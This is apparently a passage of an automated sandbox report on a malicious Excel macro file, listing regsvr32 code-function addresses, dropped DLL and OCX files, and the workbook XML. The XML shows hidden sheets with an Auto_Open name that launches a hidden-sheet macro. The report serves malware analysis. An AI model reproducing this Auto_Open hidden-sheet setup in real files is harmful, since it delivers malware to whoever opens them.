                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0031CFA05_2_0031CFA0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_003135A35_2_003135A3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0031F9AF5_2_0031F9AF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_003169985_2_00316998
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0031519C5_2_0031519C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00317B9E5_2_00317B9E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_003139835_2_00313983
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_003127835_2_00312783
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0030958A5_2_0030958A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_003205F65_2_003205F6
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0031F7F45_2_0031F7F4
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0030CDE05_2_0030CDE0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_003071E35_2_003071E3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0031E5ED5_2_0031E5ED
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_003117D25_2_003117D2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0031F5D95_2_0031F5D9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00321FC75_2_00321FC7
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00301DCA5_2_00301DCA
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0030A9CF5_2_0030A9CF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D50CF6_2_008D50CF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008EFECB6_2_008EFECB
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D82D26_2_008D82D2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D303A6_2_008D303A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D364E6_2_008D364E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008F1E496_2_008F1E49
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D88446_2_008D8844
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E4E546_2_008E4E54
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008F0E7A6_2_008F0E7A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008F13A36_2_008F13A3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D8FE96_2_008D8FE9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E81316_2_008E8131
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D4B406_2_008D4B40
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008ED15E6_2_008ED15E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E416E6_2_008E416E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D188C6_2_008D188C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E3E896_2_008E3E89
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E92856_2_008E9285
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008EA6836_2_008EA683
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E70986_2_008E7098
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E6E976_2_008E6E97
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E30946_2_008E3094
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008ED4AE6_2_008ED4AE
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008DD4BC6_2_008DD4BC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008DAEBB6_2_008DAEBB
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E66C86_2_008E66C8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008EEEC26_2_008EEEC2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008DA4DE6_2_008DA4DE
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008EFAD16_2_008EFAD1
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E86EE6_2_008E86EE
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008DC4E56_2_008DC4E5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E8EF86_2_008E8EF8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008DE4F56_2_008DE4F5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D22F76_2_008D22F7
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E9A0C6_2_008E9A0C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008F1A0A6_2_008F1A0A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008F0A016_2_008F0A01
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D9C1B6_2_008D9C1B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D70136_2_008D7013
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008DCA3C6_2_008DCA3C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E7E3D6_2_008E7E3D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E32316_2_008E3231
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E604B6_2_008E604B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D1A5F6_2_008D1A5F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008DE65A6_2_008DE65A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E90546_2_008E9054
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D806B6_2_008D806B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D186B6_2_008D186B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D958A6_2_008D958A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E39836_2_008E3983
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E27836_2_008E2783
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E7B9E6_2_008E7B9E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E519C6_2_008E519C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E69986_2_008E6998
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008EF9AF6_2_008EF9AF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E35A36_2_008E35A3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008ECFA06_2_008ECFA0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008F23B96_2_008F23B9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008DA9CF6_2_008DA9CF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D1DCA6_2_008D1DCA
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008F1FC76_2_008F1FC7
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008EF5D96_2_008EF5D9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E17D26_2_008E17D2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008EE5ED6_2_008EE5ED
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008DCDE06_2_008DCDE0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D71E36_2_008D71E3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008F05F66_2_008F05F6
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008EF7F46_2_008EF7F4
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E490E6_2_008E490E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008EAF0B6_2_008EAF0B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008DED0A6_2_008DED0A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E05036_2_008E0503
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E2B1F6_2_008E2B1F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008EA9166_2_008EA916
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008DBB146_2_008DBB14
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D27106_2_008D2710
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D43136_2_008D4313
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008EDF2B6_2_008EDF2B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E1B296_2_008E1B29
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D2F366_2_008D2F36
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E77306_2_008E7730
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D93436_2_008D9343
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D3F5A6_2_008D3F5A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008DC1516_2_008DC151
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008EE1686_2_008EE168
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E89666_2_008E8966
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D77616_2_008D7761
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008EBD636_2_008EBD63
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E303A9_2_001E303A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F4E549_2_001F4E54
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E364E9_2_001E364E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00200E7A9_2_00200E7A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E88449_2_001E8844
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00201E499_2_00201E49
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E82D29_2_001E82D2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E50CF9_2_001E50CF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001FFECB9_2_001FFECB
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F81319_2_001F8131
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001FD15E9_2_001FD15E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E4B409_2_001E4B40
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F416E9_2_001F416E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_002013A39_2_002013A3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E8FE99_2_001E8FE9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E9C1B9_2_001E9C1B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E70139_2_001E7013
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F9A0C9_2_001F9A0C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00200A019_2_00200A01
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F7E3D9_2_001F7E3D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001ECA3C9_2_001ECA3C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00201A0A9_2_00201A0A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F32319_2_001F3231
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E1A5F9_2_001E1A5F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001EE65A9_2_001EE65A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F90549_2_001F9054
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F604B9_2_001F604B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E806B9_2_001E806B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E186B9_2_001E186B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F70989_2_001F7098
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F6E979_2_001F6E97
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F30949_2_001F3094
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E188C9_2_001E188C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F3E899_2_001F3E89
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F92859_2_001F9285
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001FA6839_2_001FA683
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001ED4BC9_2_001ED4BC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001EAEBB9_2_001EAEBB
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001FD4AE9_2_001FD4AE
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001EA4DE9_2_001EA4DE
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001FFAD19_2_001FFAD1
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F66C89_2_001F66C8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001FEEC29_2_001FEEC2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F8EF89_2_001F8EF8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E22F79_2_001E22F7
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001EE4F59_2_001EE4F5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F86EE9_2_001F86EE
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001EC4E59_2_001EC4E5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F2B1F9_2_001F2B1F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001FA9169_2_001FA916
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001EBB149_2_001EBB14
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E43139_2_001E4313
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E27109_2_001E2710
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F490E9_2_001F490E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001FAF0B9_2_001FAF0B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001EED0A9_2_001EED0A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F05039_2_001F0503
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E2F369_2_001E2F36
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F77309_2_001F7730
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001FDF2B9_2_001FDF2B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F1B299_2_001F1B29
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E3F5A9_2_001E3F5A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001EC1519_2_001EC151
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E93439_2_001E9343
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001FE1689_2_001FE168
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F89669_2_001F8966
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001FBD639_2_001FBD63
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E77619_2_001E7761
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F7B9E9_2_001F7B9E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F519C9_2_001F519C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F69989_2_001F6998
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E958A9_2_001E958A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_002023B99_2_002023B9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F39839_2_001F3983
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F27839_2_001F2783
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001FF9AF9_2_001FF9AF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F35A39_2_001F35A3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001FCFA09_2_001FCFA0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001FF5D99_2_001FF5D9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F17D29_2_001F17D2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001EA9CF9_2_001EA9CF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E1DCA9_2_001E1DCA
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_002005F69_2_002005F6
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00201FC79_2_00201FC7
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001FF7F49_2_001FF7F4
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001FE5ED9_2_001FE5ED
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E71E39_2_001E71E3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001ECDE09_2_001ECDE0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0026303A10_2_0026303A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_00280E7A10_2_00280E7A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_00281E4910_2_00281E49
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0026884410_2_00268844
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0026364E10_2_0026364E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_00274E5410_2_00274E54
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_002650CF10_2_002650CF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0027FECB10_2_0027FECB
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_002682D210_2_002682D2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0027813110_2_00278131
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0027416E10_2_0027416E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_00264B4010_2_00264B40
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0027D15E10_2_0027D15E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_002813A310_2_002813A3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_00268FE910_2_00268FE9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0027323110_2_00273231
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_00277E3D10_2_00277E3D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0026CA3C10_2_0026CA3C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_00281A0A10_2_00281A0A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_00280A0110_2_00280A01
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_00279A0C10_2_00279A0C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0026701310_2_00267013
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_00269C1B10_2_00269C1B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0026806B10_2_0026806B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0026186B10_2_0026186B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0027604B10_2_0027604B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0027905410_2_00279054
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_00261A5F10_2_00261A5F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0026E65A10_2_0026E65A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0027D4AE10_2_0027D4AE
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0026D4BC10_2_0026D4BC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0026AEBB10_2_0026AEBB
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0027928510_2_00279285
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0027A68310_2_0027A683
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0026188C10_2_0026188C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_00273E8910_2_00273E89
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_00276E9710_2_00276E97
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0027309410_2_00273094
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0027709810_2_00277098
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0026C4E510_2_0026C4E5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_002786EE10_2_002786EE
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_002622F710_2_002622F7
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0026E4F510_2_0026E4F5
                        Source: 8833.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                        Source: Documento.xlsmMacro extractor: Sheet name: Br1
                        Source: Documento.xlsmMacro extractor: Sheet name: Br2
                        Source: Documento.xlsmMacro extractor: Sheet name: Br2
                        Source: Documento.xlsmMacro extractor: Sheet name: EFWFSFG
                        Source: Documento.xlsmMacro extractor: Sheet name: EFWFSFG
                        Source: Documento.xlsmMacro extractor: Sheet name: Br1
                        Source: BRqk58WkNweubruYwrLOt[1].dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: BRqk58WkNweubruYwrLOt[1].dll.0.drStatic PE information: Resource name: None type: GLS_BINARY_LSB_FIRST
                        Source: xxw1.ocx.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: xxw1.ocx.0.drStatic PE information: Resource name: None type: GLS_BINARY_LSB_FIRST
                        Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"><fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="22527"/><workbookPr defaultThemeVersion="166925"/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="C:\Users\Admin\Desktop\File\23f\Cir-ZV\CIR\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{39997D78-22C7-4743-8ECE-3023C34473AE}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" firstSheet="1" activeTab="1" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Grrr1" sheetId="2" state="hidden" r:id="rId1"/><sheet name="Sheet" sheetId="11" r:id="rId2"/><sheet name="Sbrr1" sheetId="3" state="hidden" r:id="rId3"/><sheet name="EFWFSFG" sheetId="8" state="hidden" r:id="rId4"/><sheet name="Br1" sheetId="4" state="hidden" r:id="rId5"/><sheet name="Br2" sheetId="5" state="hidden" r:id="rId6"/></sheets><definedNames><definedName name="DDDDD1">#REF!</definedName><definedName name="DDWD">EFWFSFG!$D$15</definedName><definedName name="DDWD1">EFWFSFG!$D$17</definedName><definedName name="DDWD2">EFWFSFG!$D$19</definedName><definedName name="DDWD3">EFWFSFG!$D$21</definedName><definedName name="DDWD4">EFWFSFG!$D$23</definedName><definedName name="DDWD8">EFWFSFG!$D$13</definedName><definedName name="KKLD8">#REF!</definedName><definedName name="_xlnm.Auto_Open">EFWFSFG!$D$1</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:FV"/></xcalcf:calcFeatures></ext></extLst></workbook>
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
